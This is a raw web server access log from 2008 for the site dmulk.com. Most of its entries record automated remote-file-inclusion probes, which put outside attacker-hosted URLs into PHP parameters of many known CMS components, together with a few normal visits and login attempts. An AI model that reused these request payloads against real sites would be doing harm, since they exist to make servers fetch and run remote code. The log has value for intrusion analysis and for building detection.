72.47.204.44 - - [08/Jun/2008:11:40:48 -0700] "GET /shop.php?pag=http://www.troop66nm.org/image/response1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
87.230.1.10 - - [08/Jun/2008:11:40:57 -0700] "GET /logs/access_080308.log/bookmark4u/lostpasswd.php?env[include_prefix]=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
87.230.1.10 - - [08/Jun/2008:11:40:58 -0700] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
87.230.1.10 - - [08/Jun/2008:11:40:58 -0700] "GET /logs/bookmark4u/lostpasswd.php?env[include_prefix]=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
72.14.193.167 - - [08/Jun/2008:11:41:17 -0700] "GET / HTTP/1.1" 200 16685 "http://www.bikefiles.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)" "www.dmulk.com"
72.14.193.131 - - [08/Jun/2008:11:41:18 -0700] "GET /blog/wp-content/themes/default/style.css HTTP/1.1" 200 9232 "http://www.dmulk.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)" "dmulk.com"
86.41.166.183 - - [08/Jun/2008:11:41:19 -0700] "GET /blog/wp-content/uploads/2008/04/crestoc07-3.jpg HTTP/1.1" 200 51084 "http://www.dmulk.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)" "dmulk.com"
212.34.153.42 - - [08/Jun/2008:11:41:45 -0700] "GET /?mosConfig_absolute_path=http://www.emilylamont.com/mambots/editors/tinymce/scripts/tinymce/php??? HTTP/1.1" 200 16937 "-" "libwww-perl/5.803" "www.dmulk.com"
86.41.166.183 - - [08/Jun/2008:11:41:45 -0700] "GET /blog/wp-content/uploads/2008/04/img_1120.JPG HTTP/1.1" 200 458752 "http://www.dmulk.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)" "dmulk.com"
86.41.166.183 - - [08/Jun/2008:11:41:45 -0700] "GET /blog/wp-content/uploads/2008/04/img_1123.JPG HTTP/1.1" 200 524288 "http://www.dmulk.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)" "dmulk.com"
76.76.8.197 - - [08/Jun/2008:11:42:26 -0700] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://4wdnews.com.au/files/tol.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
76.76.8.197 - - [08/Jun/2008:11:42:36 -0700] "GET /logs/access_080308.log/bookmark4u/lostpasswd.php?env[include_prefix]=http://4wdnews.com.au/files/tol.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
76.76.8.197 - - [08/Jun/2008:11:42:36 -0700] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://4wdnews.com.au/files/tol.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
76.76.8.197 - - [08/Jun/2008:11:42:36 -0700] "GET /logs/bookmark4u/lostpasswd.php?env[include_prefix]=http://4wdnews.com.au/files/tol.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
140.113.4.81 - - [08/Jun/2008:11:42:52 -0700] "GET /logs/access_080308.log/bookmark4u/lostpasswd.php?env[include_prefix]=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
140.113.4.81 - - [08/Jun/2008:11:42:52 -0700] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
221.141.3.98 - - [08/Jun/2008:11:42:53 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.injoyusa.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
221.141.3.98 - - [08/Jun/2008:11:42:53 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.injoyusa.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
140.113.4.81 - - [08/Jun/2008:11:42:53 -0700] "GET /logs/bookmark4u/lostpasswd.php?env[include_prefix]=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
221.141.3.98 - - [08/Jun/2008:11:42:53 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.injoyusa.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
221.141.3.98 - - [08/Jun/2008:11:42:53 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.injoyusa.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.25.155.27 - - [08/Jun/2008:11:43:49 -0700] "GET /logs/errors.php?error=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
201.25.155.27 - - [08/Jun/2008:11:43:54 -0700] "GET /errors.php?error=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.205.96.205 - - [08/Jun/2008:11:43:54 -0700] "GET /logs/access.log//theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.205.96.205 - - [08/Jun/2008:11:43:54 -0700] "GET //theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.205.96.205 - - [08/Jun/2008:11:43:54 -0700] "GET /logs//theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
85.10.213.91 - - [08/Jun/2008:11:44:01 -0700] "GET /errors.php?error=http://nittanywhiteout.com/help.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
74.53.240.146 - - [08/Jun/2008:11:44:04 -0700] "GET /logs/bookmark4u/lostpasswd.php?env[include_prefix]=http://municoinco.cl/weba/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
74.53.240.146 - - [08/Jun/2008:11:44:04 -0700] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://municoinco.cl/weba/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
74.200.201.194 - - [08/Jun/2008:11:44:05 -0700] "GET /logs/access_080121.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://rjoos.ch/Reise/images/tOtti/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.200.201.194 - - [08/Jun/2008:11:44:06 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://rjoos.ch/Reise/images/tOtti/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.200.201.194 - - [08/Jun/2008:11:44:06 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://rjoos.ch/Reise/images/tOtti/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
160.99.12.231 - - [08/Jun/2008:11:44:33 -0700] "GET /logs/access_080117.log//modules/vwar/admin/admin.php?vwar_root=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
160.99.12.231 - - [08/Jun/2008:11:44:34 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
160.99.12.231 - - [08/Jun/2008:11:44:34 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.200.201.194 - - [08/Jun/2008:11:44:39 -0700] "GET /logs/access_080131.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://rjoos.ch/Reise/images/tOtti/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.200.201.194 - - [08/Jun/2008:11:44:53 -0700] "GET /logs/access.log/bookmark4u/lostpasswd.php?env[include_prefix]=http://rjoos.ch/Reise/images/tOtti/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
202.221.143.111 - - [08/Jun/2008:11:45:07 -0700] "GET /logs/access_080119.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
89.218.85.18 - - [08/Jun/2008:11:45:10 -0700] "GET /logs/access.log//errors.php?error=http://e-arhontariki.gr/images/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [08/Jun/2008:11:45:10 -0700] "GET //errors.php?error=http://e-arhontariki.gr/images/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [08/Jun/2008:11:45:11 -0700] "GET /logs//errors.php?error=http://e-arhontariki.gr/images/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.47.204.44 - - [08/Jun/2008:11:45:14 -0700] "GET /admin.php?pag=http://www.troop66nm.org/image/response1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
72.47.204.44 - - [08/Jun/2008:11:45:15 -0700] "GET /logs/admin.php?pag=http://www.troop66nm.org/image/response1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
201.25.155.27 - - [08/Jun/2008:11:45:27 -0700] "GET /logs/access_080204.log//index.php?option=com_gameq&task=page&category_id=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
201.25.155.27 - - [08/Jun/2008:11:45:29 -0700] "GET //index.php?option=com_gameq&task=page&category_id=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 200 16919 "-" "libwww-perl/5.65" "www.dmulk.com"
201.25.155.27 - - [08/Jun/2008:11:45:33 -0700] "GET /logs//index.php?option=com_gameq&task=page&category_id=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.221.143.111 - - [08/Jun/2008:11:45:37 -0700] "GET /logs/access_080123.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
160.99.12.231 - - [08/Jun/2008:11:45:42 -0700] "GET /logs/access_071229.log//modules/vwar/admin/admin.php?vwar_root=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
194.208.144.81 - - [08/Jun/2008:11:46:13 -0700] "GET /logs/access_080106.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://albaworld.extra.hu/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.230.1.10 - - [08/Jun/2008:11:46:41 -0700] "GET /logs/access.log/bookmark4u/lostpasswd.php?env[include_prefix]=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
160.99.12.231 - - [08/Jun/2008:11:46:41 -0700] "GET /logs/access_080211.log//modules/vwar/admin/admin.php?vwar_root=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
160.99.12.231 - - [08/Jun/2008:11:46:43 -0700] "GET /logs/access_080228.log//modules/vwar/admin/admin.php?vwar_root=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.200.201.194 - - [08/Jun/2008:11:47:00 -0700] "GET /logs/access_080223.log//config.php?path[docroot]=http://rjoos.ch/Reise/images/tOtti/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
212.145.146.10 - - [08/Jun/2008:11:47:06 -0700] "GET /logs/access.log/phphtml.php?htmlclass_path=http://192.192.238.121/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.145.146.10 - - [08/Jun/2008:11:47:06 -0700] "GET /phphtml.php?htmlclass_path=http://192.192.238.121/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.145.146.10 - - [08/Jun/2008:11:47:07 -0700] "GET /logs/phphtml.php?htmlclass_path=http://192.192.238.121/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.218.85.18 - - [08/Jun/2008:11:47:27 -0700] "GET /logs/access_080312.log//errors.php?error=http://e-arhontariki.gr/images/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.22.37.144 - - [08/Jun/2008:11:47:35 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.patrioticusa.us/poll/.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.22.37.144 - - [08/Jun/2008:11:47:35 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.patrioticusa.us/poll/.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
70.168.36.247 - - [08/Jun/2008:11:47:56 -0700] "GET //include/lib.inc.php?site_path=http://nmbsquad-ng.110mb.com/idb.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
76.76.8.197 - - [08/Jun/2008:11:48:03 -0700] "GET /logs/access.log/bookmark4u/lostpasswd.php?env[include_prefix]=http://4wdnews.com.au/files/tol.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
76.76.8.197 - - [08/Jun/2008:11:48:06 -0700] "GET /logs/bookmark4u/lostpasswd.php?env[include_prefix]=http://4wdnews.com.au/files/tol.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
76.76.8.197 - - [08/Jun/2008:11:48:07 -0700] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://4wdnews.com.au/files/tol.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.32.68.226 - - [08/Jun/2008:11:48:18 -0700] "GET /logs/access_080308.log//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.32.68.226 - - [08/Jun/2008:11:48:28 -0700] "GET /logs//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
202.221.143.111 - - [08/Jun/2008:11:48:31 -0700] "GET /logs/access_080107.log//skin/zero_vote/error.php?dir=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.221.143.111 - - [08/Jun/2008:11:48:31 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.32.68.226 - - [08/Jun/2008:11:48:56 -0700] "GET /logs/access_080110.log//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
220.162.238.35 - - [08/Jun/2008:11:49:15 -0700] "GET /logs/access_080117.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.linknetcrew.com/code/mc22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
220.162.238.35 - - [08/Jun/2008:11:49:16 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.linknetcrew.com/code/mc22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
220.162.238.35 - - [08/Jun/2008:11:49:16 -0700] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.linknetcrew.com/code/mc22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.48.67.39 - - [08/Jun/2008:11:49:20 -0700] "GET /logs/access_080322.log//modules/vwar/admin/admin.php?vwar_root=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.221.143.111 - - [08/Jun/2008:11:49:53 -0700] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.47.204.44 - - [08/Jun/2008:11:50:00 -0700] "GET /index2.php?pag=http://www.troop66nm.org/image/response1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
72.47.204.44 - - [08/Jun/2008:11:50:00 -0700] "GET /logs/index2.php?pag=http://www.troop66nm.org/image/response1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
132.248.5.4 - - [08/Jun/2008:11:50:24 -0700] "GET /logs//mcf.php?content=http://www.geocities.com/cefill/new/echo.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
132.248.5.4 - - [08/Jun/2008:11:50:26 -0700] "GET //mcf.php?content=http://www.geocities.com/cefill/new/echo.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
140.113.4.81 - - [08/Jun/2008:11:50:31 -0700] "GET /logs/access.log/bookmark4u/lostpasswd.php?env[include_prefix]=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.55.179.18 - - [08/Jun/2008:11:50:43 -0700] "GET /logs/access_080113.log/errors.php?error=http://www.hebronhighband.org/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.55.179.18 - - [08/Jun/2008:11:50:43 -0700] "GET /errors.php?error=http://www.hebronhighband.org/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.55.179.18 - - [08/Jun/2008:11:50:43 -0700] "GET /logs/errors.php?error=http://www.hebronhighband.org/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
190.54.49.157 - - [08/Jun/2008:11:50:44 -0700] "GET /pagina.php?x=http://www.troop66nm.org/image/response1??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
190.54.49.157 - - [08/Jun/2008:11:50:44 -0700] "GET /logs/pagina.php?x=http://www.troop66nm.org/image/response1??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
141.212.113.110 - - [08/Jun/2008:11:51:09 -0700] "GET /logs/access_080507.log/phphtml.php?htmlclass_path=http://www.crapsells.us/home/uplimg/image_america.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.55.179.18 - - [08/Jun/2008:11:51:19 -0700] "GET /logs/access_080122.log/errors.php?error=http://www.hebronhighband.org/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.200.201.194 - - [08/Jun/2008:11:52:09 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://rjoos.ch/Reise/images/tOtti/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.200.201.194 - - [08/Jun/2008:11:52:09 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://rjoos.ch/Reise/images/tOtti/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
210.48.67.39 - - [08/Jun/2008:11:53:18 -0700] "GET /logs/access_080308.log/bookmark4u/lostpasswd.php?env[include_prefix]=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.48.67.39 - - [08/Jun/2008:11:53:18 -0700] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.22.37.144 - - [08/Jun/2008:11:53:18 -0700] "GET /logs/cyberfolio/portfolio/msg/view.php?av=http://www.patrioticusa.us/poll/.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
210.48.67.39 - - [08/Jun/2008:11:53:18 -0700] "GET /logs/bookmark4u/lostpasswd.php?env[include_prefix]=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.22.37.144 - - [08/Jun/2008:11:53:19 -0700] "GET /cyberfolio/portfolio/msg/view.php?av=http://www.patrioticusa.us/poll/.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.225.171.182 - - [08/Jun/2008:11:53:25 -0700] "GET /logs/modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.chonil.co.kr/zboard/icon/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.225.171.182 - - [08/Jun/2008:11:53:25 -0700] "GET /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.chonil.co.kr/zboard/icon/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.200.201.194 - - [08/Jun/2008:11:54:07 -0700] "GET /logs/access_080223.log/index2.php?page=http://rjoos.ch/Reise/images/tOtti/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.200.201.194 - - [08/Jun/2008:11:54:07 -0700] "GET /index2.php?page=http://rjoos.ch/Reise/images/tOtti/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.200.201.194 - - [08/Jun/2008:11:54:08 -0700] "GET /logs/index2.php?page=http://rjoos.ch/Reise/images/tOtti/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.7.108.240 - - [08/Jun/2008:11:54:17 -0700] "GET /logs/index.php?body=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.7.108.240 - - [08/Jun/2008:11:54:22 -0700] "GET /index.php?body=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 200 16849 "-" "libwww-perl/5.805" "www.dmulk.com"
203.237.236.11 - - [08/Jun/2008:11:54:27 -0700] "GET //tsep.0942/include/colorswitch.php?tsep_config[absPath]=http://www.cdvmbienesraices.com.mx/images/html_f2.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
72.47.204.44 - - [08/Jun/2008:11:54:58 -0700] "GET /index3.php?pag=http://www.troop66nm.org/image/response1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
72.47.204.44 - - [08/Jun/2008:11:54:58 -0700] "GET /logs/index3.php?pag=http://www.troop66nm.org/image/response1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
72.199.235.196 - - [08/Jun/2008:11:55:19 -0700] "GET /stoc HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
72.199.235.196 - - [08/Jun/2008:11:55:24 -0700] "GET /STOC HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
72.199.235.196 - - [08/Jun/2008:11:55:35 -0700] "GET /drop HTTP/1.1" 401 395 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
72.199.235.196 - - [08/Jun/2008:11:55:43 -0700] "GET /drop/stoc HTTP/1.1" 401 395 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
216.32.68.226 - - [08/Jun/2008:11:55:51 -0700] "GET /logs/access_080223.log//oneadmin/calendar/include.php?path[docroot]=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.199.235.196 - stoc [08/Jun/2008:11:55:53 -0700] "GET /drop/stoc HTTP/1.1" 401 395 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
210.48.67.39 - - [08/Jun/2008:11:55:53 -0700] "GET /logs/index.php?body=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.48.67.39 - - [08/Jun/2008:11:55:55 -0700] "GET /index.php?body=http://nozyk.org/rob.txt? HTTP/1.1" 200 16793 "-" "libwww-perl/5.805" "www.dmulk.com"
202.174.80.161 - - [08/Jun/2008:11:56:05 -0700] "GET /logs/access.log/phphtml.php?htmlclass_path=http://fan.sleepsycho.com/bajocdm2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.174.80.161 - - [08/Jun/2008:11:56:05 -0700] "GET /phphtml.php?htmlclass_path=http://fan.sleepsycho.com/bajocdm2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.174.80.161 - - [08/Jun/2008:11:56:06 -0700] "GET /logs/phphtml.php?htmlclass_path=http://fan.sleepsycho.com/bajocdm2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.10.213.91 - - [08/Jun/2008:11:56:45 -0700] "GET /logs/errors.php?error=http://nittanywhiteout.com/help.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
85.10.213.91 - - [08/Jun/2008:11:56:45 -0700] "GET /errors.php?error=http://nittanywhiteout.com/help.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
89.218.85.18 - - [08/Jun/2008:11:56:46 -0700] "GET //errors.php?error=http://e-arhontariki.gr/images/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.98.71 - - [08/Jun/2008:11:56:46 -0700] "GET /logs/index.php?body=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.98.71 - - [08/Jun/2008:11:56:49 -0700] "GET /index.php?body=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 200 16849 "-" "libwww-perl/5.805" "www.dmulk.com"
70.168.36.247 - - [08/Jun/2008:11:56:59 -0700] "GET /logs/access.log//include/lib.inc.php?site_path=http://nmbsquad-ng.110mb.com/idb.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
